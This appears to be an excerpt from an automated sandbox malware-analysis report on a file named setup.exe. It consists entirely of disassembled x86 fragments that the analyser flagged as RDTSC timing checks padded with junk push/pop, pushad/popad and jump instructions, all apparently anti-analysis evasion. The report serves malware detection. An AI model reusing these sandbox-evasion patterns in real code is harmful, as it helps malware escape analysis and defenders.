Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0532 second address: 4A056A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F47CD361217h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A056A second address: 4A0574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F47CD346616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0574 second address: 4A0578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0578 second address: 4A0594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 stc 0x0000000a lea eax, dword ptr [ebp+1248A036h] 0x00000010 mov dword ptr [ebp+122D34E0h], eax 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0594 second address: 4A059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F47CD361206h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A059F second address: 4A05A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D3C8E second address: 4D3CA9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F47CD361206h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jnl 00007F47CD361206h 0x00000013 ja 00007F47CD361206h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D3DD3 second address: 4D3DF7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47CD346621h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 je 00007F47CD346616h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D3DF7 second address: 4D3DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D3DFB second address: 4D3E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D3E01 second address: 4D3E06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D3E06 second address: 4D3E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D4289 second address: 4D428D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D428D second address: 4D429B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D429B second address: 4D42A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F47CD361206h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4541EA second address: 454202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F47CD34661Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 454202 second address: 454217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47CD36120Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DC1A5 second address: 4DC1B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DC754 second address: 4DC75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DC75A second address: 4DC79C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346625h 0x00000007 pushad 0x00000008 jmp 00007F47CD346627h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 ja 00007F47CD346648h 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F47CD346616h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DC79C second address: 4DC7A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DC7A0 second address: 4DC7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F47CD346620h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DC7BA second address: 4DC7BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DC8FD second address: 4DC903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DC903 second address: 4DC90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F47CD361206h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 45FBB5 second address: 45FBC5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F47CD346616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4E2BB0 second address: 4E2BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4E2BB7 second address: 4E2BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47CD34661Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4E2D23 second address: 4E2D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4E2FE1 second address: 4E2FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4E2FE5 second address: 4E2FE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4E3161 second address: 4E3191 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47CD346616h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F47CD34661Ch 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F47CD346616h 0x0000001f jmp 00007F47CD34661Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4E3191 second address: 4E319B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47CD361206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4E2332 second address: 4E2336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4E2336 second address: 4E233A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4E9B55 second address: 4E9B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4E980F second address: 4E9839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 ja 00007F47CD36120Eh 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 popad 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F47CD36120Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4EC79B second address: 4EC7A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F25F4 second address: 4F2608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F47CD361212h 0x0000000c je 00007F47CD361206h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F2608 second address: 4F260C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F19E5 second address: 4F1A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F47CD361206h 0x0000000a jmp 00007F47CD361212h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F47CD361206h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F1A0C second address: 4F1A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F1E54 second address: 4F1E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F47CD361220h 0x0000000f jno 00007F47CD361206h 0x00000015 jmp 00007F47CD361214h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F1E7D second address: 4F1E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 455C07 second address: 455C13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4C8B second address: 4F4CAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346626h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4CAB second address: 4F4CB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jp 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4CB7 second address: 4F4CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47CD346627h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4CD3 second address: 4F4CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4CDE second address: 4F4CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4E3F second address: 4F4E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F9FF1 second address: 4F9FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F9FFA second address: 4FA000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49FF3C second address: 49FFCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346624h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F47CD34661Bh 0x0000000e popad 0x0000000f push eax 0x00000010 jne 00007F47CD34662Bh 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F47CD346618h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F47CD346618h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov dx, cx 0x00000050 mov cx, di 0x00000053 nop 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 pushad 0x0000005a popad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49FFCA second address: 49FFD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 500629 second address: 50062D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50062D second address: 500631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 500631 second address: 500637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5007DF second address: 5007EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5007EC second address: 5007F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5007F2 second address: 5007F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5007F6 second address: 5007FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5007FA second address: 500806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 500AB0 second address: 500AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 500AB4 second address: 500AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 500D4A second address: 500D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5010A2 second address: 5010AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5010AA second address: 5010CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F47CD346616h 0x0000000c jmp 00007F47CD34661Fh 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5010CC second address: 5010DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F47CD36120Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50191A second address: 501924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F47CD346616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 501924 second address: 50192A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50192A second address: 50193A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Bh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 501EE4 second address: 501EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jg 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 501EF3 second address: 501F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD346623h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 501F0E second address: 501F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 505F8D second address: 505F91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 505F91 second address: 505F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50613D second address: 506143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 506143 second address: 50614B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 468147 second address: 46818C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jo 00007F47CD346616h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F47CD34661Ch 0x00000013 jl 00007F47CD346616h 0x00000019 popad 0x0000001a ja 00007F47CD346618h 0x00000020 popad 0x00000021 push ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007F47CD346626h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46818C second address: 468192 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 468192 second address: 46819D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46819D second address: 4681A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50EB3E second address: 50EB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jmp 00007F47CD346624h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50EB60 second address: 50EB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD361219h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50EB80 second address: 50EB85 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50DCC1 second address: 50DCE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F47CD36120Fh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F47CD36120Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50DE62 second address: 50DE79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F47CD34661Ch 0x0000000e jc 00007F47CD346616h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50DE79 second address: 50DE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50DE7F second address: 50DE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F47CD346620h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E166 second address: 50E16B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E4C7 second address: 50E4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E4CB second address: 50E4CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5173C7 second address: 5173D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5155E6 second address: 515606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361218h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 515606 second address: 51560C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51560C second address: 515612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 515612 second address: 51561E instructions: 0x00000000 rdtsc 0x00000002 js 00007F47CD34661Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
